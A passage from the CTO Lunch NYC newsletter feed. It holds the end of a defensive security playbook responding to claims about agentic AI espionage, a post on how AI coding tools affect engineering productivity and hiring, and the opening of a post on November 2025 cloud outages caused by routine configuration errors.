allow-lists for sensitive operations. Deliverable: Capability matrix showing current permissions and target restricted state, implementation plan with responsible owners.</p></li></ul></li><li><p><strong>Tool Invocation Logging (HIGH PRIORITY - 30 days)</strong></p><ul><li><p>Instrument every API endpoint that could be called by an AI agent with structured logging: request parameters, authentication context, data accessed, response payload size, execution time. Store logs in immutable storage with 90-day retention minimum. This isn&#8217;t AI-specific&#8212;it&#8217;s basic operational hygiene that pays dividends when you need to investigate anything suspicious. Deliverable: Logging dashboard showing tool invocations per service, alerting rules for anomalous patterns, runbook for incident investigation.</p></li></ul></li></ul><h5><strong>&#9633; 60 day</strong></h5><ul><li><p><strong>Human-in-the-Loop Thresholds (MEDIUM PRIORITY - 60 days)</strong></p><ul><li><p>Define categories of operations that require explicit human approval: production data access, credential generation, financial transactions, user data exports. Implement approval workflows with clear escalation paths and timeout policies. This creates defense-in-depth: even if an attacker compromises an AI system, they hit a human checkpoint before exfiltration succeeds. <strong>Deliverable</strong>: Approval matrix defining auto-approve vs human-required operations, implemented workflow with audit trail, quarterly review process.</p></li></ul></li><li><p><strong>Sandboxed Execution Environments (MEDIUM PRIORITY - 60 days)</strong></p><ul><li><p>Run AI-generated code in isolated containers with no network access to production infrastructure. Require explicit promotion after testing in staging. Use ephemeral credentials that expire after execution completes. This prevents an AI-assisted attacker from using your systems as a pivot point to internal networks. <strong>Deliverable</strong>: Container orchestration config with network policies, credential rotation automation, promotion gates requiring security review.</p></li></ul></li><li><p><strong>Rate Limiting &amp; Behavioral Baselines (MEDIUM PRIORITY - 60 days)</strong></p><ul><li><p>Establish normal request patterns for each API: typical call volume, geographic distribution, time-of-day patterns. Implement dynamic rate limiting that adapts to historical baselines. Alert on deviations exceeding 3&#963; from norm. This catches AI-accelerated attacks (sudden volume spikes) and low-and-slow reconnaissance (unusual access patterns). <strong>Deliverable</strong>: Baseline metrics per API, rate limiting rules with automatic throttling, incident response playbook for anomalous traffic.</p></li></ul></li></ul><h5><strong>&#9633; 90 day</strong></h5><ul><li><p><strong>Security Research Policy (LOW PRIORITY - 90 days)</strong></p><ul><li><p>Document how your organization handles reports of AI-assisted vulnerabilities. Establish a responsible disclosure program that distinguishes legitimate security research from malicious reconnaissance. Train SOC teams to triage AI-related alerts without assuming every unusual pattern is espionage. <strong>Deliverable</strong>: Public security.txt file with disclosure policy, internal triage criteria for AI-related alerts, quarterly training for security team on false positive patterns.</p></li></ul></li><li><p><strong>Vendor Security Questionnaire Updates (LOW PRIORITY - 90 days)</strong></p><ul><li><p>Update your vendor risk assessments to ask: How do you sandbox AI-generated code? What tool access do your models have? How do you detect AI-assisted reconnaissance? Can you provide evidence of rate limiting and anomaly detection? What&#8217;s your policy on AI model access to customer data? Most vendors won&#8217;t have good answers yet&#8212;that&#8217;s fine, but knowing which ones don&#8217;t should inform your risk calculations. <strong>Deliverable</strong>: Updated questionnaire template, risk scoring rubric for AI-specific concerns, re-evaluation schedule for critical vendors.</p></li></ul></li></ul><h2>Bottom Line</h2><p><strong>Anthropic&#8217;s post traffics in the same vague rhetoric that&#8217;s infected all AI discourse</strong>: invoke a mystical capability, give it a scary name, never define it operationally, then use the fear to justify... whatever you wanted anyway. No shade. &#127781;&#65039;</p><p>&#8220;Agentic AI espionage&#8221; isn&#8217;t a new threat category. It&#8217;s existing attack patterns executed faster by systems with larger action spaces. It&#8217;s pure dromology. The mitigation isn&#8217;t &#8220;monitoring for misuse&#8221; (whatever that means). It&#8217;s the same defense-in-depth that&#8217;s worked for decades: least-privilege access, comprehensive logging, human approval for sensitive operations, sandboxed execution, and anomaly detection.</p><p>The organizations falling behind are the ones treating &#8220;AI security&#8221; as a separate domain requiring new (and only vaguely understood) paradigms. The organizations pulling ahead recognize that AI is just another execution layer requiring the same rigorous controls we apply everywhere else: capability restrictions, audit trails, isolation boundaries, and behavioral monitoring.</p><p>CTOs: the next vendor who tells you they&#8217;re &#8220;hardening against agentic threats&#8221; without providing technical specifics is selling you security theater. Ask for the threat model. Ask for detection efficacy metrics. Ask how they distinguish espionage from legitimate use. If they can&#8217;t answer, they haven&#8217;t done the work.</p><p>The AI era doesn&#8217;t require new security principles. It requires applying existing ones rigorously to systems that can operate faster and less predictably than humans. That&#8217;s an engineering challenge, not a mystical one. And much more utilitarian. </p><div><hr></div><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to receive monthly updates from CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[The Great (AI) Replacement]]></title><description><![CDATA[I saw the best devs of my generation destroyed by agents, prompting hysterical replaced]]></description><link>https://ctolunchnyc.substack.com/p/the-great-ai-replacement</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-great-ai-replacement</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 03 Dec 2025 13:02:28 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/4934553e-d6ef-43d3-8436-e5a56777d680_928x439.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Some few dozen CTOs from NYC&#8217;s biggest and most technology focused companies</strong> recently gathered for a city-wide luncheon. They weren&#8217;t debating LLM architectures or which agentic framework was hottest this week. They definitely weren&#8217;t discussing model benchmarks or token economics. They were talking about headcount, hiring, and more quietly, AI-related existential questions asked out loud, such as, <em>What does an engineer even do in 18 months, and how do you hire for that?</em></p><p>The room was full of people who&#8217;ve already made their AI bets. Teams running with Copilot, engineering orgs experimenting with agents, departments deep into pilots that were supposed to be in production longer ago than anyone cared to admit. The question has long since moved past how <em>much</em> AI to adopt. What was being asked is what adoption means for the shape of engineering itself, and how you staff for a future you can&#8217;t predict, on planning cycles that require you do so. </p><p>Do you hire senior engineers with deep architectural intuition but slower adaptation curves to AI-augmented workflows? Do you hire junior devs native to AI tooling but lacking the experience to evaluate what the model hands them? Do you upskill your existing team, and if so, in what? Context engineering? Agent orchestration? The subtle art of reading AI-generated code as if you&#8217;re deciphering a patchwork dialect the model only half-remembers: overly verbose and fluent in syntax but not intention?</p><p><strong>The market is undergoing a structural contradiction. </strong>The overall 240,000 tech worker reduction last year contrasted sharply with the 119,000 jobs added by the broader U.S. economy. The purge included Alphabet (12,000+), Meta (10,000+), Amazon (15,000-30,000), Microsoft (5,000+), and Deloitte (1,200+) with 65,000 roles cut in the last documented month alone. Simultaneously, job listings for forward-deployed engineers surged 800% between January and September. This is the new reality: massive asset reduction alongside desperate, high-velocity hiring for AI integrators.</p><ul><li><p><strong>The Pitch</strong>: Companies like Cursor raise billions promising 40%+ productivity gains.</p></li><li><p><strong>The Reality</strong>: Carnegie Mellon <strong><a href="https://arxiv.org/pdf/2511.04427">found</a></strong> that engineers (r=807) weren&#8217;t just writing less code; they were spending more time reviewing AI-generated code that arrived faster and worse.<sup>1</sup></p></li><li><p><strong>The Failure Rate</strong>: MIT Media Lab <strong><a href="https://mlq.ai/media/quarterly_decks/v0.1_State_of_AI_in_Business_2025_Report.pdf">reported</a></strong> a 95% failure rate on enterprise generative AI pilots; and Atlassian showed 96% of enterprises seeing no real efficiency improvement.</p></li><li><p><strong>The Workslop</strong>: Harvard Business Review <strong><a href="https://hbr.org/2025/09/ai-generated-workslop-is-destroying-productivity?utm_source=chatgpt.com">showed</a></strong> that 40% of workers received AI-generated workslop last month, with each sample taking nearly two hours to fix.</p></li></ul><p>The decks promised efficiency. Ground truth looks a lot more like cost relocation fronting as innovation. It&#8217;s a movie we&#8217;ve seen before, but such recognition is, tbf, somewhat <a href="https://medium.thirdwaveberlin.com/heres-why-you-should-stop-using-william-gibson-s-the-future-is-already-here-it-s-just-unevenly-e5be2d9284f2">unevenly distributed</a>. This is an historical structural failure repeating itself. During the Desktop Publishing era (falling between object-oriented programming and cloud computing) PageMaker gave non-designers power without guardrails, resulting in the visually chaotic OG workslop of the 1992 church newsletter scourge (not to mention the curse of comic sans.) Today, agents give non-architects power without guardrails, resulting in structural chaos as workslop goes multi-modal.</p><p>The big layoffs weren&#8217;t the result of AI replacing workers. They were the result of leadership not being able to justify headcount while uncertainty is compounding faster than quarterly reviews can track. The topic has moved past AI adoption to how the engineering substrate can support AI safely, and what&#8217;s needed to update current infrastructure to support this new complexity.  <em>The question isn&#8217;t whether AI replaces developers. It&#8217;s how the infrastructure we&#8217;re building can support what happens when it tries</em>, and whether we&#8217;re measuring what actually matters when we do.</p><h3>Context &amp; Background: What&#8217;s Actually Being Replaced</h3><blockquote><p><strong>The Great AI Replacement isn&#8217;t happening the way the hype promised. <br>AI isn&#8217;t replacing developers; it is replacing bad architecture.</strong>  </p></blockquote><p>    <strong>The myth is alluring</strong>: AI will replace developers, maybe even engineers more broadly. Or in its most pernicious form, AI as a senior engineer you can delegate to. The reality is that AI is more like a highly competent junior that&#8217;s bizarrely gifted with near-perfect recall and no basis for judgment. Successful teams understand this robo-junior who can move mountains if given the right guardrails; less able teams delegate to it like a senior and are rewarded with chaos. </p><p>Underneath all the hype, the  developer extinction event is really an architectural revelation.&#128330;&#65039; AI isn&#8217;t replacing developers; it&#8217;s revealing the architectural maturity of your codebase. Which organizations built their engineering substrate with intention, and which ones duct-taped microservices together and called it architecture. This is the part of the conversation that tends to be publicly demurred; high-performing teams care about code style not because they&#8217;re pedantic, but because style is the artifact of architecture, <em>non pareil.</em></p><p>Does the AI know your tombstone pattern? Your last-write-wins semantics? Your state transitions? Your service boundaries? The answer is: not unless you teach it. And teaching it requires the kind of architectural clarity most codebases simply don&#8217;t have.</p><div class="pullquote"><p><strong>AI isn&#8217;t replacing developers; it&#8217;s revealing the architectural maturity of your codebase.</strong></p></div><h3>The Magic Productivity Theater</h3><p><strong>The more the industry repeats &#8220;40% productivity gains,&#8221; the more it feels</strong> like a mantra meant to soothe investors rather than inform operators. (And operators mainly talk to investors through markets.) But the ground truth tells a different story, built on structural contradictions that lead to a singular thesis: AI generates code quickly, but not code you can actually <strong>trust</strong>.</p><p>Broken trust is felt through every layer of the stack; the rage developers feel debugging hallucinated refactors isn&#8217;t irrationality, it&#8217;s a reasonable response to being handed tedious, unnecessary cleanup work and being told it&#8217;s the future. Wasn&#8217;t this what Rossum&#8217;s <strong>robots</strong> were supposed to do for us? Wasn&#8217;t that literally the name coinage? </p><p>Trust in theory isn&#8217;t about believing AI works any more than its about doing  drudgery. Rather, it was about having that done for you. Which in practice means trust is about having infrastructure that catches AI when it doesn&#8217;t. Think of it as the other side of <a href="https://www.maybedont.ai/">Maybe Don&#8217;t</a>: <strong>what if you have to?</strong> </p><p>If you&#8217;re a regular reader, you know one answer to that: the <a href="/__u/ctolunchnyc.substack.com/i/175499834/ai-native-sdlc-flywheel">AI-native SDLC flywheel</a> built on zero-trust infrastructure. But most organizations haven&#8217;t built that. Instead, they delegated architectural trust, often to the model itself. (Holding out hope its API would enforce the constraints their codebases lacked.) But the magic isn&#8217;t in the model; it&#8217;s in the architectural guardrails and infrastructure constraints that high-leverage teams built <em>before</em> AI arrived:</p><ul><li><p><strong>Architectural Legibility</strong>: They enforce type systems as guardrails, rather than aesthetics (looking at you, Python) making the codebase legible to machines.</p></li><li><p><strong>Agent Orchestration</strong>: They implement per-repo context engineering (Monorepos hate this one weird trick); encode style guides as system prompts; turn models into specialized, constrained agents.</p></li><li><p><strong>Zero-Trust SDLC</strong>: They treat AI output like a junior&#8217;s PR, subjecting it to rigorous review and observable behavior  (AI O11y 2.0).</p></li></ul><p>This flips the equation. Once the substrate supports safe code generation, <strong>a single engineer with well-instrumented agents can handle work that previously required cross-team coordination.</strong>  Stack boundaries collapse. (Latencies drop!) Backend ops are pushed the edge. 10x teams are no longer the aspiration; 100x teams become possible. The ROI split is stark and revealing: And while most companies see low or negative ROI; the top 5% see enormous gains. <strong>So what&#8217;s the magic?</strong> </p><p>The teams in the top 5% aren&#8217;t smarter or luckier. They built their architecture to support AI before AI arrived. They enforced types. They documented patterns. They made their codebases legible to machines, which made them legible to humans, which made them maintainable at scale. <em>Ok, so maybe they were smarter.</em> The other 95% are learning a lesson in entropy, (that teacher of teachers) namely, you can&#8217;t retrofit clarity onto chaos. You can&#8217;t bolt AI onto a microservices architecture held together by institutional knowledge and hope it navigates service boundaries correctly. <strong>Call it Conway&#8217;s revenge.</strong> </p><p>Meanwhile the industry is playing out the finale of <em>Steppenwolf</em>, the same desperate drama that consumed Harry Haller in his search for transcendence, finding only a theatre of smoke and mirrors. The <em>applied</em> magic isn&#8217;t in the model; it&#8217;s in the constraints. Successful teams built architectural guardrails <em>before</em> AI arrived. The industry keeps funding this performance, but when the curtain is pulled back it&#8217;s seen to be sustained by the smoke of those promised 40% gains and billion-dollar valuations, while the  mirrors are just reflecting the organization&#8217;s own undisciplined substrate, schema-less data paths, ad-hoc service boundaries, type-free interfaces, missing invariants, half-documented patterns, (/etc /etc) and a CI pipeline that treats validation as a suggestion. What looks like &#8220;AI productivity&#8221; is really your own architectural entropy being poured back into your lap at machine speed; the magic theatre of productivity only feels real until you realize the output isn&#8217;t creation at all: it&#8217;s a funhouse reflection of the system you&#8217;ve decided to tolerate.</p><h3>What CTOs Are Actually Measuring</h3><p>The questions at the lunch table weren&#8217;t just about hiring (though headcount and vendor selection dominated the discussion.) The more salient question was and is measurement. How do you know if AI is working? Velocity, deployment frequency, and Lines of Code (LOC) were designed for humans writing code; not humans reviewing code that arrives pre-written and quite possibly <em>wrong</em>. </p><p>The gap between perceived productivity and actual productivity is <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-august-2025#:~:text=that%E2%80%99d%20be%20a-,39%25%20deficit,-.%20Not%20surprisingly%2C%20the">39 percentage points</a>. Teams <em>feel</em> 20% more productive with AI tools. Measurement shows they&#8217;re 19% slower. This is where the measurement question becomes architectural. If you cannot measure PR cycle time, deployment frequency, and change failure rate before and after AI adoption, every decision is guesswork wrapped in vibes. The <a href="/__u/ctolunchnyc.substack.com/i/175499834/ai-native-sdlc-flywheel">intelligence flywheel</a> only spins when measurement informs action. You need to know:</p><ul><li><p>How much time is spent generating code vs reviewing code</p></li><li><p>How often AI-generated code passes review without changes</p></li><li><p>What types of bugs AI introduces that humans catch</p></li><li><p>Which architectural patterns AI handles safely vs which it mangles</p></li><li><p>Whether your experienced engineers are mentoring AI or just cleaning up after it</p></li></ul><p>Only with this data can you actually optimize the system. The 5% who succeed are measuring what matters. The 95% who fail are measuring what&#8217;s easy. Andy Grove and Rich Hickey should probably have a fireside chat about this. </p><ul><li><p>Trust Gap: How often AI-generated code passes review without changes.</p></li><li><p>Workload Shift: How much time is spent generating code vs. reviewing code.</p></li><li><p>Pattern Safety: Which architectural patterns AI handles safely versus which it mangles.</p></li></ul><div class="pullquote"><p><strong>The real replacement isn&#8217;t of engineers; <br>it&#8217;s of the outdated measurement systems that reinforce chaos.</strong></p></div><h2>CTO Playbook: 30/60/90</h2><h5><em>Quarterly OKR:  Shift the engineering culture from mechanically using AI tools to structurally managing the risks associated with agent-generated complexity.</em></h5><h5><strong>&#9633; 30 day: Foundation Guardrails and Trust Controls</strong></h5><ul><li><p>Codebase Legibility Score (CRITICAL):</p><ul><li><p><strong>Action</strong>: Audit critical repositories for &#8220;machine legibility&#8221;: scoring them based on type coverage and formalized state transition patterns.</p></li><li><p><strong>Goal</strong>: Identify the most brittle areas where AI agents will introduce the highest &#8220;workslop.&#8221;</p></li></ul></li><li><p>Encode Style as System Prompts (HIGH):</p><ul><li><p>Action: Formalize style guides and architectural best practices (e.g., &#8220;no implicit state sharing&#8221;) and encode them directly into the system prompts for all developer-facing AI tools.</p></li><li><p><strong>Goal</strong>: Instantly turn AI from a general code generator into a constrained, domain-aware junior developer.</p></li></ul></li><li><p>Adopt &#8220;Junior PR&#8221; Review Policy (HIGH):</p><ul><li><p><strong>Action</strong>: Institute a formal policy that treats all AI-generated code blocks as if they came from a junior developer, requiring 100% human review.</p></li><li><p><strong>Goal</strong>: Close the &#8220;broken trust&#8221; gap and shift the human workflow to critically auditing and maintaining the system&#8217;s structural integrity.</p></li></ul></li></ul><h5><strong>&#9633; 60 day: Agent Orchestration and Measurement</strong></h5><ul><li><p>Implement AI Observability (MEDIUM HIGH):</p><ul><li><p><strong>Action</strong>: Deploy decision-tracing instrumentation for all autonomous agents: capturing not just <em>what</em> code was written, but <em>why</em> the agent chose that architectural solution.</p></li><li><p><strong>Goal</strong>: Provide the data needed for true root-cause analysis, fulfilling the AI O11y 2.0 mandate.</p></li></ul></li><li><p>Establish Trust-Based Metrics (MEDIUM):</p><ul><li><p><strong>Action</strong>: Deprecate Lines of Code (LOC). Begin tracking AI-specific metrics: Review Pass Rate (how often AI output passes review without changes) and Change Failure Rate attributable to AI-introduced bugs.</p></li><li><p>G<strong>o</strong>al: Close the 39-point gap between perceived and actual productivity.</p></li></ul></li><li><p>Upskill in Context Engineering (MEDIUM):</p><ul><li><p><strong>Action</strong>: Begin mandatory training for senior engineers on Context Engineering and Agent Orchestration.</p></li><li><p><strong>Goal</strong>: Preserve senior architectural expertise by retraining them to enforce constraints and mentor the AI, rather than cleaning up its &#8220;workslop.&#8221;</p></li></ul></li></ul><h5><strong>&#9633; 90 day: Structural Investment</strong></h5><ul><li><p>Platform Engineering for Agentic SDLC (HIGH STRATEGY):</p><ul><li><p><strong>Action</strong>: Task the Platform Engineering team with building internal tools that provide safe, constrained deployment pathways exclusively for agent-generated code.</p></li><li><p><strong>Goal</strong>: Ensure agentic code can move fast within established guardrails, without ever touching brittle manual paths.</p></li></ul></li><li><p>Architectural Pattern Enforcement (MEDIUM STRATEGY):</p><ul><li><p><strong>Action</strong>: Invest in tools (static analysis, pre-commit hooks) that automatically enforce your architectural patterns and service boundaries, even if the code is AI-generated.</p></li><li><p><strong>Goal</strong>: Make the codebase physically resistant to architectural drift, preventing the AI from introducing misconfigurations.</p></li></ul></li><li><p>Hiring Profile Redefinition (MEDIUM STRATEGY):</p><ul><li><p><strong>Action</strong>: Redefine the engineering hiring profile: shifting emphasis from coding speed to architectural intuition, critical reasoning, and maintenance skills.</p></li><li><p><strong>Goal</strong>: Hire for the skill that the AI cannot replicate: judgment.</p></li></ul></li></ul><h2>Bottom Line</h2><p>The Great AI Replacement isn&#8217;t happening the way the hype promised. Developers aren&#8217;t being replaced; they&#8217;re being asked to fix two hours of slop for every two hours of work. The real leverage isn&#8217;t automation; it&#8217;s augmentation with guardrails.</p><p>The best CTOs aren&#8217;t talking about &#8220;AI strategy&#8221;; they&#8217;re talking about people, processes, and the underlying architectural substrate that lets AI work safely instead of chaotically. They&#8217;re measuring what actually matters: trust, reproducibility, and the delta between what AI generates and what ships to production. </p><p>If your strategy is to delegate trust without first enforcing architectural constraints, you&#8217;re not building the future. You&#8217;re discovering that the infrastructure you built for humans doesn&#8217;t support agents; and retrofitting clarity onto chaos is expensive enough that you might as well rebuild from scratch. It&#8217;s PageMaker all over again, except for code, and instead of Comic Sans we get type-free interfaces and missing invariants, <em>structural</em> chaos mirroring the <em>visual</em> chaos of the 1990s.</p><p>An illegible, unreadable codebase is, in fact, the ultimate <a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money#:~:text=the%20Cost%20of-,Beached%20Assets,-Will%20Implode%20the">Beached Asset</a>: a massive  expenditure (incl. engineering labor and tooling) that can never be fully operationalized by an agentic future where the winners aren&#8217;t the earliest adopters but the ones who adopt with intention, rationalised architecture, and a sober understanding of what AI <em>actually</em> <em>does</em>. Ninety-five percent fail; five percent don&#8217;t. The best CTOs are in the five percent, by definition. </p><div><hr></div><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to receive monthly updates and support CTO Lunch NYC.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Infra Penny, Infra Pound]]></title><description><![CDATA[(How) Trading Resilience for Convenience Created the Autonomous Architecture Mandate]]></description><link>https://ctolunchnyc.substack.com/p/infra-penny-infra-pound</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/infra-penny-infra-pound</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Tue, 02 Dec 2025 13:03:54 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!RDz9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>On November 18, 20% of the global web went dark for three hours</strong>. Not from a cyberattack. Not from physical infrastructure failure. A single <code>.unwrap()</code> call in Cloudflare&#8217;s Rust codebase brought down X, OpenAI, Discord, and critical infrastructure across five continents. The trigger was a database permission change. The catalyst was a SQL query missing a WHERE clause, returning double the expected data. The crash was a hard-coded limit in a panicky edge worker that didn&#8217;t  degrade gracefully.</p><p>The day before, Microsoft Azure&#8217;s Front Door collapsed after a <em>small change</em> to its load balancer. Services went dark globally for two hours. The week prior, AWS suffered a control-plane outage that took down over <a href="http://3500+ companies">3,500 companies</a> when a race condition in an internal orchestration system deadlocked during routine deployment. Three weeks, three Tier 1 infrastructure providers, three internal glitches that cascaded into existential failures for companies who thought they&#8217;d architected for resilience. </p><p>Digital Ocean users discovered upstream Cloudflare exposure when their services (Spaces CDN, App Platform, and global load balancers) went offline simultaneously, a dependency quietly mentioned in their <a href="https://www.digitalocean.com/trust/subprocessors">subprocessors page</a>. GitHub Ops went down hours after Cloudflare recovered, tracing back to a shared dependency on Cloudflare&#8217;s edge network for DDoS mitigation. Hidden upstream and transitive dependencies are everywhere. Railway.com launched an object storage service that&#8217;s simply a wrapper for Wasabi buckets, a fact not mentioned anywhere, not even on their subprocessors page. Most CTOs don&#8217;t discover these hidden fault lines until the blast radius reaches their dashboards.</p><p>This month&#8217;s cluster of outages across AWS, Azure, Cloudflare, and GitHub didn&#8217;t teach us anything new but reminded us of something we&#8217;ve spent a decade pretending wasn&#8217;t true. We&#8217;ve built a world where the smallest operational decision can have the biggest operational blast radius. Not because the failures were exotic. Not because a nation-state attacker slipped through a zero-day. But because of something much harder to defend against: routine changes traveling through systems that are no longer routine.</p><p>This is the new failure mode: not direct dependencies but transitive ones, where your infrastructure&#8217;s infrastructure fails and only you find out why by reading incident reports on <a href="https://news.ycombinator.com/">HN</a>. You saved pennies by outsourcing infrastructure to hyperscale providers. Now you&#8217;re in for a pound when their cascading failures take down your entire operation and takes a big bite of revenue.  Small changes that turn out not to be&#8230; &#8220;small change.&#8221;  &#128374;&#65039;  What&#8217;s <em>really</em> changed is the scale at which &#8220;normal engineering&#8221; now operates. Choosing cloud infrastructure means your survival depends on it. Cost savings from abstraction get repriced 10x or 100x when outages compound across your stack. CTOs need architectural patterns that follow through when dependencies fail, which means building for resilience isn&#8217;t optional anymore. </p><p>As if it ever was. </p><div class="pullquote"><p>&#10077; <strong>The Internet was designed to survive a nuclear bomb. <br>On November 18, 2025, it couldn&#8217;t survive a missing </strong><code>WHERE</code><strong> clause.</strong> &#10078;</p></div><h2>Context and Background</h2><p><strong>Except the Internet wasn&#8217;t designed to survive a nuclear incident.</strong> Charles Herzfeld, ARPA director during ARPANET&#8217;s inception, <a href="https://www.coro.net/blog/history-of-cybersecurity-and-cyber-threats#:~:text=ARPANET%20was%20not%20started%20to%20create%20a%20Command%20and%20Control%20System%20that%20would%20survive%20a%20nuclear%20attack">put it bluntly</a>:  &#8221;<em>The goal of ARPANET was to facilitate communication and resource sharing between researchers and institutions. While there has been speculation ARPANET was prompted by the need for a reliable and decentralized system that could withstand nuclear attacks, that is false</em>.&#8221; Akshully, the true goal was addressing a practical reality: expensive, scarce computing resources needed to be shared among geographically separate research institutions. This goal is often confused with conceptual work on resilient communication by Paul Baran at RAND in the 1960s, which study predates and was entirely separate from ARPANET&#8217;s development, but provided the genesis for an enduring, conspiratorial urban legend.</p><p>Aside from Baran&#8217;s high-level work at RAND, none of the packet switching pioneers were responding to military survivability requirements. Donald Davies at NPL in the former UK, Leonard Kleinrock MIT developing the mathematical theory for his 1962 MIT dissertation, the ARPANET teams, (also the CYCLADES group in France) all focused on resource sharing and research networking. The US military developed its own techniques for redundancy (SAGE network) but we&#8217;d have to wait until 1983 for a genuinely military packet-switched network: the Defense Data Network / MILNET.</p><p>Packet switching doesn&#8217;t magically remove central infrastructure. It only removes the requirement for a single, unique central switch. In practice you still have the  specialized intermediate nodes familiar to network engineers (routers, gateways, IXPs, core routers), hierarchical routing, and centralized services (DNS hierarchy, BGP route reflectors, large backbones, CDNs, cloud providers.) Outages at Cloudflare, Azure, and AWS are not flaws in Internet protocols themselves but in particular service architectures deployed on top of them.</p><div class="pullquote"><p>We didn&#8217;t lose the distributed Internet in November. We just stopped using it.</p></div><h3>Industry Impact</h3><h5><strong>Inverting the Design Goal</strong></h5><p>We traded resilience for convenience, concentrating 50% of the web&#8217;s traffic into three vendors. Cloudflare handles roughly a fifth of global web traffic. When their proxy code calls <code>.unwrap()</code> on a Result for an operation expected to never fail (ha) and that expectation proves wrong, that&#8217;s a fifth of the Internet potentially going dark. Azure&#8217;s Front Door routes traffic for millions of enterprise applications. When a configuration change to its load balancer triggers a cascading failure, those applications don&#8217;t fail gracefully, they disappear. AWS&#8217;s control plane orchestrates infrastructure for, um, a significant fraction, of the modern web. When a race condition deadlocks during routine deployment, over <a href="/__u/ctolunchnyc.substack.com/p/dont-lose-sleep-over-it#:~:text=the%203500%2B%20companies%20that%20went%20dark">3,500 companies</a> simultaneously lose access to their own infrastructure. We optimized for cost, and quietly rebuilt the Internet to behave like a single, giant, fragile mainframe whose health depends on whether one engineer, somewhere, gets one line of config right.</p><p>The year-end promotion cycle amplifies this risk. Changes get pushed with less diligence, reviewed with less scrutiny, and deployed with less caution bc everyone&#8217;s focused on closing out their performance metrics before the ball drops.  The cultural DNA here misaligns organizational incentives with operational stability right when traffic peaks for holiday shopping, year-end closes, and Q4 revenue recognition. It&#8217;s everything at once, like the web&#8217;s own <a href="https://en.citizendium.org/wiki/epagomenal_day">epagomenal days</a>, a period outside ordinary time when the margin for error vanishes and every latent flaw get its reckoning. <br>(This also explains why the holidays <a href="https://ibb.co/svQw2VsY">overlap</a> more and more, but don&#8217;t get me started.)</p><p>Such speed is a double-edged sword. It drives world-class agility: we see organizations like Cloudflare where co-founders are reviewing customer-reported product defects <a href="https://x.com/oguzhankocakli/status/1969808227404767721">within ten minutes</a> and shipping fixes the next day, an unheard-of velocity for a company of that magnitude. Yet, this same institutional velocity allows the catastrophic deployment of a change containing an uncaught exception (that unwrap() panic) that takes down a fifth of the global internet. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!RDz9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, 